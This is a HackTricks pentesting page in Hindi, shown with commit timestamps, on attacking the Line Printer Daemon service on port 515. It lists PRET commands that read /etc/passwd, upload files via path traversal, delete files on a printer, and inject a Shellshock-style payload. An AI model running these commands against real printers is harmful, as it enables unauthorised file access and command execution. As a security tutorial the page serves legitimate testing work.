hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md

52 lines
7.3 KiB
Markdown
Raw Normal View History

2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने की अनुमति चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके।**
2022-04-28 16:01:33 +00:00
</details>
2023-11-06 08:38:02 +00:00
लाइन प्रिंटर डेमन (LPD) प्रोटोकॉल को पहले बर्कले यूनिक्स में 80 के दशक में पेश किया गया था (बाद में RFC1179 द्वारा निर्दिष्ट किया गया)।\
डेमन 515/tcp पोर्ट पर चलता है और `lpr` कमांड का उपयोग करके पहुंचा जा सकता है। प्रिंट करने के लिए, क्लाइंट एक **नियंत्रण फ़ाइल** भेजता है जिसमें जॉब / उपयोगकर्ता को परिभाषित किया जाता है और एक **डेटा फ़ाइल** भेजता है जिसमें वास्तविक डेटा होता है जो प्रिंट किया जाना है। डेटा फ़ाइल का **इनपुट प्रकार** नियंत्रण फ़ाइल में निर्धारित किया जा सकता है अलग-अलग फ़ाइल प्रारूपों में से चुनकर। हालांकि, यह LPD के अंतर्निहित कर्मचारी को वास्तव में प्रिंट डेटा को कैसे हैंडल करना है, इस पर निर्भर करता है। यूनिक्स-जैसे ऑपरेटिंग सिस्टम के लिए एक लोकप्रिय LPD कार्यान्वयन LPRng है। LPD को एक वाहक के रूप में उपयोग किया जा सकता है ताकि खतरनाक **पोस्टस्क्रिप्ट** या **PJL प्रिंट जॉब्स** को डिप्लॉय किया जा सके।
2023-11-06 08:38:02 +00:00
`lpdprint` और `lpdtest` टूल [**PRET**](https://github.com/RUB-NDS/PRET)** में शामिल हैं।** ये एक न्यूनतम तरीका है जिससे डेटा को सीधे LPD सक्षम प्रिंटर पर प्रिंट किया जा सकता है या फ़ाइलें डाउनलोड/अपलोड/हटा सकते हैं और बहुत कुछ:
```
lpdprint.py hostname filename
2020-07-28 00:00:37 +00:00
lpdtest.py hostname get /etc/passwd
lpdtest.py hostname put ../../etc/passwd
lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local
```
2023-11-06 08:38:02 +00:00
यदि आप [**प्रिंटर हैकिंग के बारे में और अधिक जानना चाहते हैं तो इस पेज को पढ़ें**](pentesting-printers/).
2023-11-06 08:38:02 +00:00
# शोडन
2023-11-06 08:38:02 +00:00
* `पोर्ट 515`
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित करना** चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें**.
2022-04-28 16:01:33 +00:00
</details>